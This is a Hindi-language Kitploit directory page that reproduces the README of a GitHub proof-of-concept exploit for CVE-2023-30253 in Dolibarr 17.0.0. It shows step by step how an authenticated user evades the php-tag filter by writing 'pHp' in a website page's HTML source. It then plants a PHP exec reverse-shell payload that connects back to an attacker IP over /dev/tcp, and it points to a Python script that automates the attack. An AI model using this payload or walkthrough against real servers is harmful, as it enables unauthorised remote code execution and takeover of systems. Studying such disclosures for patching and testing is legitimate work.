Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — Dolibarr 17.0.0 में CMS Website प्लगइन (कोर) सक्षम होने पर, एक प्रमाणित हमलावर एप्लिकेशन प्रतिबंधों को दरकिनार करते हुए php कोड इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन प्राप्त कर सकता है। | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

Dolibarr 17.0.0 में CMS Website प्लगइन (कोर) सक्षम होने पर, एक प्रमाणित हमलावर एप्लिकेशन प्रतिबंधों को दरकिनार करते हुए php कोड इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन प्राप्त कर सकता है।

रिपॉजिटरी देखें
9312 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Readme.md

CVE-2023-30253

CVE-2023-30253 Dolibarr सॉफ्टवेयर में एक सुरक्षा दोष है जो प्रमाणित उपयोगकर्ताओं को इंजेक्ट किए गए डेटा में अपरकेस हेरफेर तकनीक का उपयोग करके रिमोट कोड निष्पादित करने में सक्षम बनाता है।

प्रभाव

यह कमजोरी दुर्भावनापूर्ण अभिनेताओं द्वारा अनधिकृत रिमोट कोड निष्पादन का कारण बन सकती है, जो प्रभावित सिस्टम की सुरक्षा और अखंडता के लिए गंभीर खतरा पैदा करती है। यह कमजोरी Dolibarr 17.0.1 में ठीक कर दी गई है।

संदर्भ

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


प्रूफ ऑफ कॉन्सेप्ट

निम्नलिखित PoC दिखाता है कि मैन्युअल रूप से रिवर्स शेल कैसे प्राप्त करें।

Untitled.png

test उपयोगकर्ता के रूप में लॉग इन करने के बाद, हम वेबसाइट बना/संशोधित कर सकते हैं।

Untitled (1).png

पहले एक वेबसाइट बनाएं, और फिर एक पेज बनाएं।

Untitled (2).png

Untitled

वेबसाइट और पेज बनाने के बाद, दूरबीन आइकन पर क्लिक करें, यह हमारे बनाए गए पेज को एक नए टैब में खोलेगा।

अब Edit HTML Source पर क्लिक करें।

Untitled (4).png

यहां हम php कोड जोड़ने का प्रयास कर सकते हैं, लेकिन किसी प्रकार का फ़िल्टर हमें php कोड लिखने से रोक रहा है। इसे php शब्द के प्रारूप को बदलकर आसानी से बायपास किया जा सकता है।

Untitled (5).png

php शब्द के प्रारूप को pHp में बदलने के बाद, हम देख सकते हैं कि यह सफलतापूर्वक सहेजा गया है।

Untitled (6).png

पेज पर जाने पर, हम देख सकते हैं कि हमारा डाला गया php कोड काम कर रहा है।

अब रिवर्स शेल प्राप्त करने के लिए, netcat सुनने वाला सेट करें।

Untitled (7).png

Untitled (8).png

फिर हमारा रिवर्स शेल कोड जोड़ें <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

अब वेबसाइट खोलने पर, हमें रिवर्स शेल मिलता है।

Untitled (9).png




हम इसे आसान बनाने के लिए python कोड का उपयोग कर सकते हैं।

Untitled

netcat सुनने वाला सेट करें।

Untitled

स्क्रिप्ट चलाएं और हमें एक रिवर्सशेल मिलना चाहिए।

Untitled स्क्रिप्ट के लेखक: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

टूल डाउनलोड करें